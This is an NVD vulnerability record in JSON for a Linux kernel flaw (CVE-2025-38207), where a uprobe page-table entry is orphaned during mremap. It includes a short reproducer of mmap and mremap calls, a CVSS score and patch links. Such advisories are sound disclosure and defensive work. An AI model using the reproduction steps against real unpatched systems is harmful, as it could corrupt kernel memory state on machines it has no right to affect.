{"resultsPerPage":1,"startIndex":0,"totalResults":1,"format":"NVD_CVE","version":"2.0","timestamp":"2026-04-19T16:38:52.790","vulnerabilities":[{"cve":{"id":"CVE-2025-38207","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-07-04T14:15:28.823","lastModified":"2025-11-18T17:07:12.037","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nmm: fix uprobe pte be overwritten when expanding vma\n\nPatch series \"Fix uprobe pte be overwritten when expanding vma\".\n\n\nThis patch (of 4):\n\nWe encountered a BUG alert triggered by Syzkaller as follows:\n   BUG: Bad rss-counter state mm:00000000b4a60fca type:MM_ANONPAGES val:1\n\nAnd we can reproduce it with the following steps:\n1. register uprobe on file at zero offset\n2. mmap the file at zero offset:\n   addr1 = mmap(NULL, 2 * 4096, PROT_NONE, MAP_PRIVATE, fd, 0);\n3. mremap part of vma1 to new vma2:\n   addr2 = mremap(addr1, 4096, 2 * 4096, MREMAP_MAYMOVE);\n4. mremap back to orig addr1:\n   mremap(addr2, 4096, 4096, MREMAP_MAYMOVE | MREMAP_FIXED, addr1);\n\nIn step 3, the vma1 range [addr1, addr1 + 4096] will be remap to new vma2\nwith range [addr2, addr2 + 8192], and remap uprobe anon page from the vma1\nto vma2, then unmap the vma1 range [addr1, addr1 + 4096].\n\nIn step 4, the vma2 range [addr2, addr2 + 4096] will be remap back to the\naddr range [addr1, addr1 + 4096].  Since the addr range [addr1 + 4096,\naddr1 + 8192] still maps the file, it will take vma_merge_new_range to\nexpand the range, and then do uprobe_mmap in vma_complete.  Since the\nmerged vma pgoff is also zero offset, it will install uprobe anon page to\nthe merged vma.  However, the upcomming move_page_tables step, which use\nset_pte_at to remap the vma2 uprobe pte to the merged vma, will overwrite\nthe newly uprobe pte in the merged vma, and lead that pte to be orphan.\n\nSince the uprobe pte will be remapped to the merged vma, we can remove the\nunnecessary uprobe_mmap upon merged vma.\n\nThis problem was first found in linux-6.6.y and also exists in the\ncommunity syzkaller:\nhttps://lore.kernel.org/all/000000000000ada39605a5e71711@google.com/T/"},{"lang":"es","value":"En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: mm: se corrige la sobrescritura del archivo uprobe al expandir vma. Serie de parches \"Corregir la sobrescritura del archivo uprobe al expandir vma\". Este parche (de 4): Se detectó una alerta de error generada por Syzkaller: Error: Estado incorrecto del contador RSS mm:00000000b4a60fca tipo:MM_ANONPAGES val:1. Se puede reproducir con los siguientes pasos: 1. Registrar uprobe en el archivo con desplazamiento cero. 2. Asignar el archivo con mmap en el desplazamiento cero: addr1 = mmap(NULL, 2 * 4096, PROT_NONE, MAP_PRIVATE, fd, 0); 3. Asignar con mremap parte de vma1 al nuevo vma2: addr2 = mremap(addr1, 4096, 2 * 4096, MREMAP_MAYMOVE); 4. mremap de vuelta a la dirección original 1: mremap(addr2, 4096, 4096, MREMAP_MAYMOVE | MREMAP_FIXED, addr1); En el paso 3, el rango vma1 [addr1, addr1 + 4096] se reasignará a la nueva vma2 con rango [addr2, addr2 + 8192] y se reasignará la página uprobe anon de vma1 a vma2, luego desasignará el rango vma1 [addr1, addr1 + 4096]. En el paso 4, el rango vma2 [addr2, addr2 + 4096] se reasignará de nuevo al rango addr [addr1, addr1 + 4096]. Dado que el rango de direcciones [addr1 + 4096, addr1 + 8192] aún asigna el archivo, se requerirá vma_merge_new_range para expandir el rango y luego ejecutar uprobe_mmap en vma_complete. Dado que el desplazamiento de la página de la vma fusionada también tiene desplazamiento cero, se instalará uprobe anon page en la vma fusionada. Sin embargo, el siguiente paso `move_page_tables`, que usa `set_pte_at` para reasignar la pte de uprobe vma2 a la vma fusionada, sobrescribirá la nueva pte de uprobe en la vma fusionada y la dejará huérfana. Dado que la pte de uprobe se reasignará a la vma fusionada, podemos eliminar uprobe_mmap innecesario al fusionar la vma. Este problema se encontró por primera vez en linux-6.6.y y también existe en la comunidad syzkaller: https://lore.kernel.org/all/000000000000ada39605a5e71711@google.com/T/"}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5","versionEndExcluding":"6.15.4","matchCriteriaId":"70F17898-FFE8-46CE-936C-A820CAF98A94"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/2b12d06c37fd3a394376f42f026a7478d826ed63","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/58b83b9a9a929611a2a2e7d88f45cb0d786b7ee0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}}]}